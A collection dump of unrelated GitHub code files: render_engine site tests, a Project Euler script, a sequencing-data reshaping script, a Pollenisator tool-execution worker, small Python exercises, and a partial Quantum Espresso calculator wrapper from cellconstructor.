\"customroute2\"]\n\n site.page(CustomPage)\n\n assert len(site.route_list) == 1\n\ndef test_url_for_Page_in_site(tmp_path):\n \"\"\"Tests that url_for a page is added to a template\"\"\"\n test_template = pathlib.Path(tmp_path / \"template.html\")\n test_template.write_text(\"The URL is '{{ 'custompage'|url_for }}'\")\n site = Site()\n site.engine.loader.loaders.insert(0, FileSystemLoader(tmp_path))\n site.output_path = tmp_path\n\n @site.page\n class CustomPage(Page):\n template = test_template.name\n\n site.render()\n custom_page = (tmp_path / \"custompage.html\")\n assert custom_page.exists()\n assert custom_page.read_text() == \"The URL is '/custompage.html'\"\n\n\ndef test_collection_archive_in_route_list(tmp_path):\n \"\"\"Given a collection with an archive, the archive should be in the route list and accessible with url_for\"\"\"\n test_collection_archive_template = pathlib.Path(tmp_path / \"archive_template.html\")\n test_collection_archive_template.write_text(\"This is the collection archive\")\n\n test_collection_template = pathlib.Path(tmp_path / \"collection_archive_item_template.html\")\n test_collection_template.write_text(\"The collection archive route is at '{{ 'customcollection' |url_for }}'\")\n\n site = Site()\n site.engine.loader.loaders.insert(0, FileSystemLoader(tmp_path))\n site.output_path = tmp_path\n\n\n class CustomCollectionPage(Page):\n template = test_collection_template.name\n 
\n\n @site.collection\n class CustomCollection(Collection):\n archive_template = test_collection_archive_template.name\n has_archive = True\n pages = [CustomCollectionPage()]\n\n\n site.render()\n assert pathlib.Path(tmp_path / \"customcollection.html\").exists()\n assert pathlib.Path(tmp_path / \"customcollectionpage.html\").exists()\n assert pathlib.Path(tmp_path / \"customcollection.html\").read_text() == \"This is the collection archive\"\n assert pathlib.Path(tmp_path / \"customcollectionpage.html\").read_text() == \"The collection archive route is at '/customcollection.html'\"\n\n@pytest.mark.parametrize(\n \"page_number,expected_url\",\n [\n (0, \"custompagescollection.html\"),\n (1, \"custompagescollection1.html\"),\n (2, \"custompagescollection2.html\"),\n ]\n)\ndef test_collection_archive_pages_in_route_list(tmp_path, page_number, expected_url):\n \"\"\"Given a collection with an archive, the archive should be in the route list and accessible with url_for\"\"\"\n test_collection_pages_template = pathlib.Path(tmp_path / f\"collection_archive_item_pages_template{page_number}.html\")\n test_collection_pages_template.write_text(\n f\"The collection archive route is at {{{{ 'custompagescollection' | url_for(page={page_number})}}}}\",\n )\n\n site = Site()\n site.engine.loader.loaders.insert(0, FileSystemLoader(tmp_path))\n site.output_path = tmp_path\n\n\n class CustomCollectionPages1(Page):\n content = 'test'\n class CustomCollectionPages2(Page):\n content = 'test'\n\n @site.collection\n class CustomPagesCollection(Collection):\n archive_template = test_collection_pages_template.name\n has_archive = True\n pages = [CustomCollectionPages1(), CustomCollectionPages2()]\n items_per_page = 1\n\n\n site.render()\n expected_path = pathlib.Path(tmp_path / expected_url)\n assert expected_path.exists()\n assert expected_path.read_text() == f\"The collection archive route is at /{expected_url}\"\n\n\ndef test_url_for_Collection_in_site(tmp_path):\n \"\"\"Tests that url_for a page in a collection is added to a template\"\"\"\n test_template = pathlib.Path(tmp_path / \"custom_template.html\")\n test_template.write_text(\"The URL is '{{ 'customcollection.customcollectionpage' | url_for }}'\")\n \n site = Site()\n site.engine.loader.loaders.insert(0, FileSystemLoader(tmp_path))\n site.output_path = tmp_path\n\n\n class CustomCollectionPage(Page):\n template = test_template.name\n\n @site.collection\n class CustomCollection(Collection):\n template = test_template.name\n pages = [CustomCollectionPage()]\n\n site.render()\n custom_page = (tmp_path / \"customcollectionpage.html\")\n assert custom_page.exists()\n assert custom_page.read_text() == \"The URL is '/customcollectionpage.html'\"\n\n\ndef test_site_output_path(tmp_path):\n \"\"\"Tests site outputs to output_path\"\"\"\n\n output_tmp_dir = tmp_path / \"output\"\n output_tmp_dir.mkdir()\n\n class CustomSite(Site):\n output_path = output_tmp_dir\n\n site = CustomSite()\n @site.page\n class CustomPage(Page):\n content = \"this is a test\"\n\n site.render()\n\n assert (output_tmp_dir / \"custompage.html\").exists()\n\n\ndef test_site_static_renders_in_static_output_path(tmp_path, site):\n \"\"\"\n Tests that a static file is rendered in the static output path.\n \"\"\"\n\n static_tmp_dir = tmp_path / \"static\"\n output_tmp_dir = tmp_path / \"output\"\n output_tmp_dir.mkdir()\n static_tmp_dir.mkdir()\n pathlib.Path(static_tmp_dir / pathlib.Path(\"test.txt\")).write_text(\"test\")\n\n site.output_path = output_tmp_dir\n 
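# render() copies the registered static paths beneath output/static, as the assert below checks\n    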
site.static_paths.add(static_tmp_dir)\n    site.render()  \n\n    assert (output_tmp_dir / \"static\" / \"test.txt\").exists()\n\ndef tests_site_nested_static_paths(tmp_path, site):\n    \"\"\"given a static path with nested directories, the output should be the same\"\"\"\n    static_tmp_dir = tmp_path / \"static\"\n    output_tmp_dir = tmp_path / \"output\"\n    output_tmp_dir.mkdir()\n    static_tmp_dir.mkdir()\n    pathlib.Path(static_tmp_dir / \"nested\").mkdir()\n    pathlib.Path(static_tmp_dir / \"nested\" / pathlib.Path(\"test.txt\")).write_text(\"test\")\n    pathlib.Path(static_tmp_dir / pathlib.Path(\"test.txt\")).write_text(\"test\")\n\n    site.output_path = output_tmp_dir\n    site.static_paths.add(static_tmp_dir)\n    site.render()  \n    assert (output_tmp_dir / \"static\" / \"test.txt\").exists()\n    assert (output_tmp_dir / \"static\" / \"nested\" / \"test.txt\").exists()\n\ndef tests_site_multiple_static_paths(tmp_path, site):\n    \"\"\"given multiple static paths, every one of them should be copied to the output\"\"\"\n    static_tmp_dir = tmp_path / \"static\"\n    output_tmp_dir = tmp_path / \"output\"\n    output_tmp_dir.mkdir()\n    static_tmp_dir.mkdir()\n    pathlib.Path(static_tmp_dir / pathlib.Path(\"test.txt\")).write_text(\"test\")\n\n    second_static_tmp_dir = tmp_path / \"static2\"\n    second_static_tmp_dir.mkdir()\n    pathlib.Path(second_static_tmp_dir / pathlib.Path(\"test2.txt\")).write_text(\"test\")\n\n    site.output_path = output_tmp_dir\n    site.static_paths.update([static_tmp_dir, second_static_tmp_dir])\n    site.render()  \n    assert (output_tmp_dir / \"static\" / \"test.txt\").exists()\n    assert (output_tmp_dir / \"static2\" / \"test2.txt\").exists()","repo_name":"kjaymiller/render_engine","sub_path":"tests/test_site.py","file_name":"test_site.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"}
{"seq_id":"9932906184","text":"# Project Euler\n# Problem 3\n\n# The prime factors of 13195 are 5, 7, 13 and 29.\n\n# What is the largest prime factor of the number 600851475143 ?\n\n# http://stackoverflow.com/questions/15347174/python-finding-prime-factors\n\nn = 600851475143\ni = 2\n\nwhile i * i <= n:\n\twhile n % i == 0:\n\t\tprint(i)\n\t\tn = n // i\n\ti += 1\n\nprint(n)","repo_name":"ysx001/project_euler","sub_path":"python/p_003.py","file_name":"p_003.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"28949118653","text":"import numpy as np\nimport glob\n\"\"\"\nThe final data has shape (101, 4, w, h) or (101, w, h, 4).\nw and h differ from dataset to dataset.\n\"\"\"\nlist_reads = []\nlist_channel = []\nlist_cycle = []\ncycle = 101\nmachinename = 'highDens'\nrunname='R001C001'\n\ntotalpath_A = glob.glob(r\"E:\\\code\\\python_PK\\\callbase\\\datasets\\\{}\\\Result\\\Lane01\\\deepLearnData\\\*\\\intensity\\\{}_A.npy\".format(machinename,runname))\nmsk_path = r\"E:\\\code\\\python_PK\\\callbase\\\datasets\\\{}\\\Result\\\Lane01\\\deepLearnData\\\{}_mask.npy\".format(machinename,runname)\nmsk = np.load(msk_path).astype(int)\nmsk[msk==-1]=0 # drop reads that were not mapped\ntotalReadsNum = np.sum(abs(msk)) # only msk == 1: how many reads there are in one image\nbian =int( np.ceil(totalReadsNum**0.5))\nnumreads = bian**2\n# split totalReadsNum into a 2:1 width:height ratio\ndataArray = np.zeros((101,4,numreads))\nlabel_array = np.zeros((101,numreads)) # label is a single channel with values 0-5, so it is effectively 2-D\nn = 0\nfor pathA in totalpath_A:\n    pathC = pathA.replace(\"A\",\"C\")\n    pathG = pathA.replace(\"A\",\"G\")\n    pathT = pathA.replace(\"A\",\"T\")\n    listPath = [pathA,pathC,pathG,pathT]\n    pathLabel = 
pathA.replace(\"intensity\",\"label\").replace(\"A\",\"label\")\n label = np.load(pathLabel).flatten()\n listimg = []\n\n for path in listPath:\n listimg.append(np.load(path).flatten()[np.newaxis,:])\n # listimg has 4 imgs, make it an array\n imgTotal = np.concatenate(listimg) # 4,hxw\n msk = msk.flatten()\n idx = np.where(msk!=0)\n result_ = imgTotal[:,idx].transpose([1,0,2]) # numreads,1,channel .squeeze().transpose() # numreads,channel,size\n result_label = label[idx].transpose()\n\n dataArray[n:n+1,:,:totalReadsNum] = result_ # m: reads in one picture,n:n-th cycle,\n label_array[n,:totalReadsNum] = result_label\n #label_array[m,n] = label[i,j]\n n = n + 1 #\n print(\"totalreads is {},n is {}\".format(totalReadsNum,n))\nnew_dataArray = dataArray.reshape(101,4,bian,bian)\nnew_label_array = label_array.reshape(101,bian,bian)\n\nnp.save(\"pailie/{}_{}.npy\".format(machinename,runname), dataArray)\nnp.save(\"pailie/{}_{}_label.npy\".format(machinename,runname), label_array)\n #np.save(\"21_R001C001_label.npy\",label_array)\n\n #246138 R002C034_A 去除label 为5和未mapping的\n\n\n\n\n","repo_name":"pksolar/sailus","sub_path":"bleeding/method1/pailie.py","file_name":"pailie.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38291305646","text":"\"\"\"worker module. Execute code and store results in database, files in the SFTP server.\n\"\"\"\n\nimport errno\nimport os\nimport ssl\nimport sys\nimport uuid\nimport time\nfrom datetime import datetime, timedelta\nfrom bson.objectid import ObjectId\nfrom multiprocessing import Process\nfrom pollenisatorcli.core.apiclient import APIClient\nfrom pollenisatorcli.core.Models.Interval import Interval\nfrom pollenisatorcli.core.Models.Tool import Tool\nfrom pollenisatorcli.core.Models.Command import Command\nfrom pollenisatorcli.utils.utils import execute, fitNowTime, loadToolsConfig\nfrom pollenisatorcli.utils.utils import print_error, print_formatted_text, print_formatted\n\ndef executeCommand(apiclient, toolId, parser=\"\", local=True, allowAnyCommand=False):\n \"\"\"\n remote task\n Execute the tool with the given toolId on the given calendar name.\n Then execute the plugin corresponding.\n Any unhandled exception will result in a task-failed event in the class.\n\n Args:\n apiclient: the apiclient instance.\n toolId: the mongo Object id corresponding to the tool to execute.\n parser: plugin name to execute. 
If empty, the plugin specified in tools.d will be fetched.\n local: boolean, set the execution in a local context\n Raises:\n Terminated: if the task gets terminated\n OSError: if the output directory cannot be created (not if it already exists)\n Exception: if an exception unhandled occurs during the bash command execution.\n Exception: if a plugin considered a failure.\n \"\"\"\n # Connect to given calendar\n APIClient.setInstance(apiclient)\n toolModel = Tool.fetchObject({\"_id\":ObjectId(toolId)})\n if toolModel is None:\n return False, \"Tool failed to be created\"\n command_o = toolModel.getCommand()\n msg = \"\"\n ##\n success, comm, fileext, bin_path_server = apiclient.getCommandline(toolId, parser)\n if local:\n tools_infos = loadToolsConfig()\n # Read file to execute for given tool and prepend to final command\n if tools_infos.get(toolModel.name, None) is not None:\n bin_path_local = tools_infos[toolModel.name].get(\"bin\")\n parser = tools_infos[toolModel.name].get(\"plugin\", \"Default.py\")\n success, comm, fileext, bin_path_server = apiclient.getCommandline(toolId, parser)\n if bin_path_server == \"\":\n comm = bin_path_local +\" \"+comm\n else:\n comm = comm.replace(bin_path_server, bin_path_local)\n success = True\n elif allowAnyCommand:\n success, comm, fileext, bin_path_server = apiclient.getCommandline(toolId, parser)\n success = True\n else:\n success = False\n comm = \"This tool is not configured for local usage; Please check Settings\"\n else:\n success, comm, fileext, bin_path_server = apiclient.getCommandline(toolId, parser)\n if not success:\n toolModel.setStatus([\"error\"])\n return False, str(comm)\n \n outputRelDir = toolModel.getOutputDir(apiclient.getCurrentPentest())\n abs_path = os.path.dirname(os.path.abspath(__file__))\n toolFileName = toolModel.name+\"_\" + \\\n str(time.time()) # ext already added in command\n outputDir = os.path.join(abs_path, \"./results\", outputRelDir)\n \n # Create the output directory\n try:\n os.makedirs(outputDir)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(outputDir):\n pass\n else:\n print_error(str(exc))\n toolModel.setStatus([\"error\"])\n return False, str(exc)\n outputDir = os.path.join(outputDir, toolFileName)\n comm = comm.replace(\"|outputDir|\", outputDir)\n # Get tool's wave time limit searching the wave intervals\n if toolModel.wave == \"Custom commands\" or local:\n timeLimit = None\n else:\n timeLimit = getWaveTimeLimit(toolModel.wave)\n # adjust timeLimit if the command has a lower timeout\n if command_o is not None and timeLimit is not None:\n timeLimit = min(datetime.now()+timedelta(0, int(command_o.get(\"timeout\", 0))), timeLimit)\n ##\n try:\n print_formatted_text(('TASK STARTED:'+toolModel.name))\n if timeLimit is not None:\n print_formatted_text(\"Will timeout at \"+str(timeLimit))\n # Execute the command with a timeout\n returncode, stdout = execute(comm, timeLimit, False)\n if returncode == -1:\n raise Exception(\"Tool Timeout\")\n except Exception as e:\n print_error(str(e))\n toolModel.setStatus([\"error\"])\n return False, str(e)\n # Execute found plugin if there is one\n outputfile = outputDir+fileext\n print_formatted(f\"Uploading {outputfile} tool result ...\")\n msg = apiclient.importToolResult(toolId, parser, outputfile)\n if msg != \"Success\":\n #toolModel.markAsNotDone()\n print_error(str(msg))\n toolModel.setStatus([\"error\"])\n return False, str(msg)\n \n # Delay\n if command_o is not None:\n if float(command_o.get(\"sleep_between\", 0)) > 0.0:\n msg += \" (will 
sleep for \" + \\\n str(float(command_o.get(\"sleep_between\", 0)))+\")\"\n print_formatted_text(msg)\n time.sleep(float(command_o.get(\"sleep_between\", 0)))\n return True, os.path.normpath(outputfile)\n \ndef getWaveTimeLimit(waveName):\n \"\"\"\n Return the latest time limit in which this tool fits. The tool should timeout after that limit\n\n Returns:\n Return the latest time limit in which this tool fits.\n \"\"\"\n intervals = Interval.fetchObjects({\"wave\": waveName})\n furthestTimeLimit = datetime.now()\n for intervalModel in intervals:\n if fitNowTime(intervalModel.dated, intervalModel.datef):\n endingDate = intervalModel.getEndingDate()\n if endingDate is not None:\n if endingDate > furthestTimeLimit:\n furthestTimeLimit = endingDate\n return furthestTimeLimit\n\n\n","repo_name":"fbarre96/PollenisatorCLI","sub_path":"pollenisatorcli/AutoScanWorker.py","file_name":"AutoScanWorker.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17940229185","text":"\"\"\"\nYou are given a dictionary consisting of word pairs. Every word is a synonym the other word in its pair. All the words in the dictionary are different.\n\nFirst line of the input specifies how many word pairs will follow. After the dictionary there is one more word given. Find a synonym for this word.\n\nHint. To solve the problem quickly, use dictionaries.\n\nFor example, on input\n3\nwater liquid\nfire heat\npython java\nfire\noutput must be\nheat\n\"\"\"\ncount = int(input())\ndiki = {}\nfor i in range(0, count):\n pair = input().split()\n diki[pair[0]] = pair[1]\n\ntarget = input()\nprint(diki[target])\n","repo_name":"piotrpatrzylas/Repl.it","sub_path":"POP1 Part-time/Session 3 Problem 16: Dictionary of synonyms.py","file_name":"Session 3 Problem 16: Dictionary of synonyms.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4249382548","text":"from server.models import Parking\n\ndata={\n '_id' : \"TW-1-1\",\n 'status' : \"empty\", # empty or inuse \n 'license_plate' : \"EAC8668\",\n 'position':['121.519','25.035'],\n 'error':'',\n 'machine' : \"E01\"\n}\nParking.create_parking(data)\n# data={\n# '_id' : \"TW-1-2\",\n# 'status' : \"empty\", # empty or inuse \n# 'license_plate' : \"\",\n# 'position':['121.519','25.033'],\n# 'machine' : \"E02\"\n# }\n# Parking.create_parking(data)\n# # Parking.get_parking({})","repo_name":"Timothychen00/RoadParking-server","sub_path":"test/parking_test.py","file_name":"parking_test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35663754085","text":"\nN=int(input())\nYmin=9\nNmax=2\nif N==0 :\n print('F')\nelse:\n for i in range(N):\n cnt, yn = input().split()\n cnt = int(cnt)\n if yn is 'Y':\n if Ymin > cnt: Ymin = cnt\n else:\n if Nmax < cnt: Nmax = cnt\n\n if Nmax < Ymin:\n print(Ymin)\n else:\n print('F')\n","repo_name":"gogumasitda/TIL","sub_path":"algorithm/0227/선생님/배부른돼지.py","file_name":"배부른돼지.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"cy","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"20727424172","text":"import io\nfrom operator import mod\nimport sys\n\n_INPUT = \"\"\"\\\n7 10\n11 12 16 22 27 28 31\n\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n# ---------------------------------\nn, k = map(int, 
input().split())\naa = list(map(int, input().split()))\n\n# two-pointer (\"shakutori\") sliding-window method\nR = [0 for _ in range(n)]\n\nfor a_i, a in enumerate(aa):\n    if a_i != 0:\n        R[a_i] = R[a_i - 1]\n\n    # if R[a_i] == a_i:\n    #     R[a_i] += 1\n\n    tmp_diff = 0\n    while R[a_i] + 1 != n:\n        tmp_diff = aa[R[a_i] + 1] - a\n        if tmp_diff <= k:\n            R[a_i] += 1\n        else:\n            break\n\nans = 0\nfor i, r in enumerate(R):\n    ans += r - i\n\nprint(ans)\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"tessoku/A13.py","file_name":"A13.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4824055494","text":"\n## Descriptor class, used to proxy attributes of the owning class\nclass Typed:\n    def __init__(self,name,expected_type):\n        self.name = name\n        self.expected_type = expected_type\n\n    def __get__(self, instance, owner):\n        print('__get__ was called')\n        if instance is None:\n            return self\n        return instance.__dict__[self.name]\n\n    def __set__(self, instance, value):\n        print('__set__ was called')\n        if isinstance(value,self.expected_type):\n            instance.__dict__[self.name] = value\n        else:\n            raise TypeError('wrong type for the input value')\n\n    def __delete__(self, instance):\n        print('__delete__ was called')\n\ndef typeassert(**kwargs):\n    def wrapper(cls):\n        print('the decorator runs only once') ## Hip = wrapper(Hip)\n        for key,value in kwargs.items():\n            setattr(cls,key,Typed(key,value)) ### set class attributes on the class\n        print('---',cls.__dict__)\n        return cls\n    return wrapper\n\n@typeassert(name=str,age=int,salary=float)\nclass Hip():\n    def __init__(self,name,age,salary):\n        self.name = name\n        self.age = age\n        self.salary = salary\n\nh = Hip('Mike',18,1235.66)\nprint(h.name)\n# h.name = 2312\nh.name = 'Keiven'\nprint(h.name)\nprint(h.__dict__)\nprint(Hip.__dict__)","repo_name":"huotong1212/mylearnpy","sub_path":"code/day08/类装饰器/testde.py","file_name":"testde.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"31128293034","text":"# Pickling is a process of serializing an object. Serializing means to store the object in the form of binary\n# representation so it can be saved to disk or sent across a network. The object could be a string, tuple,\n# or any other sort of object that Python supports.\n\n\n\n# In this example, we will pickle a dictionary. 
We will save it to a file and then load it again.\n\n\nimport pickle\n\n# Pickling a python object\n\n# cars = [\"Audi\", \"BMW\", \"Maruti Suzuki\", \"Harryti Tuzuki\"]\n# file = \"80 mycar.pkl\"\n# fileobj = open(file, 'wb')\n# pickle.dump(cars, fileobj)\n# fileobj.close()\n\n\n# unpickling\n\nfile = \"80 mycar.pkl\"\nfileobj = open(file, 'rb')\nmycar = pickle.load(fileobj)\nprint(mycar)\nprint(type(mycar))\n\n\n# pickle.loads = ?\n\n\n\n\n","repo_name":"harshitsingh20/PythonNotes-All-Program-","sub_path":"79 Picklingsss.py","file_name":"79 Picklingsss.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
{"seq_id":"19022975610","text":"import cellconstructor as CC\nimport cellconstructor.Structure\nimport cellconstructor.Methods\n\nimport subprocess\n\nimport ase, ase.io\nimport ase.calculators.calculator\n\nimport cellconstructor.Settings as Settings\n\nimport cellconstructor.Units\nimport copy\n\nimport scipy, scipy.optimize\n\nimport numpy as np\nimport sys, os\n\n\n\n\nclass Calculator:\n    def __init__(self):\n        \"\"\"\n        CELLCONSTRUCTOR CALCULATOR\n        ===========================\n        \n        This is an alternative to ASE calculators, which often do not work.\n        It is written explicitly for cellconstructor and python-sscha.\n        \n        \"\"\"\n\n        self.label = \"label\"\n        self.directory = None \n        self.command = None \n        self.results = {}\n        self.structure = None \n\n    def set_directory(self):\n        pass\n\n\n\ndef get_energy_forces(calculator, structure):\n    \"\"\"\n    Accepts both an ASE calculator and a CellConstructor Calculator\n    \"\"\"\n\n    if isinstance(calculator, ase.calculators.calculator.Calculator):\n        atm = structure.get_ase_atoms()\n        atm.set_calculator(calculator)\n\n        energy = atm.get_total_energy()\n\n        if isinstance(energy, np.ndarray):\n            energy = energy[0]\n\n        forces = atm.get_forces()\n        return energy, forces\n    elif isinstance(calculator, Calculator):\n        calculator.calculate(structure)\n        return calculator.results[\"energy\"], calculator.results[\"forces\"]\n    else:\n        raise ValueError(\"Error, unknown calculator type\")\n\ndef get_results(calculator, structure, get_stress = True):\n    \"\"\"\n    Accepts both an ASE calculator and a Calculator from Cellconstructor\n    and computes all the implemented properties (energy, forces and stress tensor).\n    \"\"\"\n\n    results = {}\n    if isinstance(calculator, ase.calculators.calculator.Calculator):\n        atm = structure.get_ase_atoms()\n        atm.set_calculator(calculator)\n        results[\"energy\"] = atm.get_total_energy()\n        results[\"forces\"] = atm.get_forces()\n        if get_stress:\n            results[\"stress\"] = atm.get_stress(voigt = False)\n    elif isinstance(calculator, Calculator):\n        calculator.calculate(structure)\n        results = calculator.results\n        if get_stress:\n            results[\"stress\"] = CC.Methods.transform_voigt(results[\"stress\"], voigt_to_mat = True)\n    else:\n        raise ValueError(\"Error, unknown calculator type\")\n\n    return results\n\n\nclass FileIOCalculator(Calculator):\n    def __init__(self):\n        Calculator.__init__(self)\n        self.structure = None\n        self.output_file = \"PREFIX.pwo\"\n\n    def write_input(self, structure):\n        if self.directory is None:\n            self.directory = os.path.abspath(\".\")\n\n        if not os.path.isdir(self.directory):\n            os.makedirs(self.directory)\n        \n        # This is not thread safe, as writing the input overrides the structure of the shared calculator object,\n        # which is then overridden by read_results\n        #self.structure = structure.copy()\n\n    def 
calculate(self, structure):\n self.write_input(structure)\n self.execute()\n self.read_results()\n\n def set_label(self, lbl):\n self.label = lbl\n\n def set_directory(self, directory):\n self.directory = directory\n\n # Produce the directory if it does not exists\n if not os.path.exists(directory):\n os.makedirs(directory)\n \n def execute(self):\n #cmd = \"cd {} && {} && cd ..\".format(self.directory, self.command.replace(\"PREFIX\", self.label))\n cmd = self.command.replace(\"PREFIX\", os.path.join(os.path.abspath(self.directory),self.label))\n outputfname = self.output_file.replace(\"PREFIX\", os.path.join(os.path.abspath(self.directory),self.label))\n\n\n new_env = {k: v for k, v in os.environ.items() if \"MPI\" not in k if \"PMI\" not in k}\n sys.stdout.flush()\n with open(os.path.join(self.directory, outputfname), \"w\") as foutput:\n proc = subprocess.Popen(cmd, shell = True, env = new_env, cwd = self.directory, stdout = foutput)\n sys.stdout.flush()\n errorcode = proc.wait()\n sys.stdout.flush()\n\n \n #os.system(cmd)\n\n def read_results(self):\n pass \n\n\nclass Espresso(FileIOCalculator):\n def __init__(self, input_data = {}, pseudopotentials = {}, masses = None, command = \"pw.x -i PREFIX.pwi\", kpts = (1,1,1), koffset = (0,0,0)):\n \"\"\"\n ESPRESSO CALCULATOR\n ===================\n\n parameters\n ----------\n data_input : dict\n Dictionary of the Quantum Espresso PW input namespace\n pseudopotentials : dict\n Dictionary of the file names of the pseudopotentials\n masses : dict\n Dictionary of the masses (in UMA) of the specified atomic species\n kpts : list\n A list of the k points grid to sample the space.\n If the calculation is given at gamma, use the gamma string.\n Note gamma is incompatible with a koffset\n \"\"\"\n FileIOCalculator.__init__(self)\n\n self.command = command\n self.kpts = kpts\n self.koffset = koffset\n self.input_data = copy.deepcopy(input_data) # Copy to avoid double modification\n self.pseudopotentials = pseudopotentials\n self.output_file = \"PREFIX.pwo\"\n if masses is None:\n masses = {}\n for atm in pseudopotentials:\n masses[atm] = 1.000\n self.masses = masses\n\n assert len(list(self.pseudopotentials)) == len(list(self.masses)), \"Error, pseudopotential and masses must match\"\n\n def copy(self):\n \"\"\"\n Return an identical instance, without inhering the info of the calculation.\n \"\"\"\n new_class = Espresso(self.input_data, self.pseudopotentials, self.masses, self.command, self.kpts, self.koffset)\n return new_class\n\n\n def set_label(self, lbl, override_prefix = True, *args, **kwargs):\n FileIOCalculator.set_label(self, lbl, *args, **kwargs)\n\n # Enforce the override of the prefix\n if override_prefix:\n if \"control\" in self.input_data:\n self.input_data = copy.deepcopy(self.input_data)\n self.input_data[\"control\"].update({\"prefix\" : lbl})\n\n def setup_from_ase(self, ase_calc):\n \"\"\"\n Copy the parameters from the ASE calculator\n \"\"\"\n\n for kwarg in ase_calc.parameters:\n self.__setattr__(kwarg, copy.deepcopy(ase_calc.parameters[kwarg]))\n\n self.set_label(ase_calc.label)\n\n #self.input_data = copy.deepcopy(ase_calc.parameters[\"input_data\"])\n #self.kpts = ase_calc.parameters[\"kpts\"]\n #self.koffset = ase_calc.parameters[\"koffset\"]\n #self.pseudopotentials = copy.deepcopy(ase_calc.parameters[\"pseudopotentials\"])\n\n def write_input(self, structure):\n FileIOCalculator.write_input(self, structure)\n\n typs = np.unique(structure.atoms)\n\n total_input = copy.deepcopy(self.input_data)\n 
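# work on a deep copy so the per-structure updates below do not leak back into the shared input_data\n        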
total_input[\"system\"].update({\"nat\" : structure.N_atoms, \"ntyp\" : len(typs), \"ibrav\" : 0})\n #total_input[\"control\"].update({\"outdir\" : self.directory, \"prefix\" : self.label})\n if not \"prefix\" in total_input[\"control\"]:\n total_input[\"control\"].update({\"prefix\" : self.label}) \n\n scf_text = \"\".join(CC.Methods.write_namelist(total_input))\n\n print(\"TOTAL INPUT:\")\n print(total_input)\n scf_text += \"\"\"\nATOMIC_SPECIES\n\"\"\"\n for atm in typs:\n if not atm in self.pseudopotentials:\n raise ValueError(f\"Error, the key {atm} is not a valid atom specified in the pseudopotentials: {list(self.pseudopotentials)}\")\n scf_text += \"{} {} {}\\n\".format(atm, self.masses[atm], self.pseudopotentials[atm])\n \n if isinstance(self.kpts, str):\n if self.kpts.lower() == 'gamma':\n scf_text += '''\nK_POINTS gamma\n'''\n else:\n raise ValueError('Error, kpts msut be either list or gamma, {} not recognized'.format(self.kpts))\n elif len(np.shape(self.kpts)) == 2:\n nkpts, _ = np.shape(self.kpts)\n scf_text += '''\nK_POINTS crystal\n{}\n'''.format(nkpts)\n for i in range(nkpts):\n scf_text += '{:.16f} {:.16f} {:.16f} 1\\n'.format(*list(self.kpts[i, :]))\n elif len(self.kpts) == 3:\n scf_text += \"\"\"\nK_POINTS automatic\n{} {} {} {} {} {}\n\"\"\".format(self.kpts[0], self.kpts[1], self.kpts[2],\n self.koffset[0], self.koffset[1], self.koffset[2])\n \n \n scf_text += structure.save_scf(None, get_text = True)\n\n filename = os.path.join(self.directory, self.label + \".pwi\")\n\n with open(filename, \"w\") as fp:\n fp.write(scf_text)\n \n\n def read_results(self, override_structure = True):\n FileIOCalculator.read_results(self)\n\n\n filename = os.path.join(self.directory, self.label + \".pwo\")\n\n print('READING RESULTS FROM FILE ', filename)\n \n # Settings.all_print(\"reading {}\".format(filename))\n #atm = ase.io.read(filename)\n\n energy = 0\n read_forces = False\n counter = 0\n stress = np.zeros((3,3), dtype = np.double)\n\n read_stress = False\n got_stress = False\n read_structure = override_structure\n read_coords = False\n alat = CC.Units.BOHR_TO_ANGSTROM\n\n # If we read until the stress\n # Everything went correctly, otherwise check for the JOB DONE\n job_done = False\n\n if self.structure is None:\n read_structure = True\n else:\n forces = np.zeros_like(self.structure.coords)\n\n with open(filename, \"r\") as fp:\n for line in fp.readlines():\n line = line.strip()\n data = line.split()\n\n # Avoid white lines\n if not line:\n continue\n \n # Check if the script exited correctly\n if \"JOB DONE\" in line:\n job_done = True\n\n if read_structure:\n new_data = line.replace(\"=\", \" \").split()\n if new_data[0] == \"celldm(1)\":\n alat *= float(new_data[1])\n \n if \"number of atoms/cell\" in line:\n nat = int(data[-1])\n self.structure = CC.Structure.Structure(nat)\n self.structure.has_unit_cell = True\n self.structure.unit_cell = np.eye(3)\n forces = np.zeros_like(self.structure.coords)\n\n if data[0] == \"a(1)\":\n self.structure.unit_cell[0,:] = [float(x) * alat for x in data[3:-1]]\n if data[0] == \"a(2)\":\n self.structure.unit_cell[1,:] = [float(x) * alat for x in data[3:-1]]\n if data[0] == \"a(3)\":\n self.structure.unit_cell[2,:] = [float(x) * alat for x in data[3:-1]]\n \n if \"Cartesian axes\" in line:\n read_coords = True\n\n\n if read_coords:\n # Improve the split of the line to avoid merging numbers\n data = line.replace(\"-\", \" -\").replace(\"(\", \"( \").split()\n if len(data) == 10:\n i_atm = int(data[0]) - 1\n self.structure.coords[i_atm, :] = 
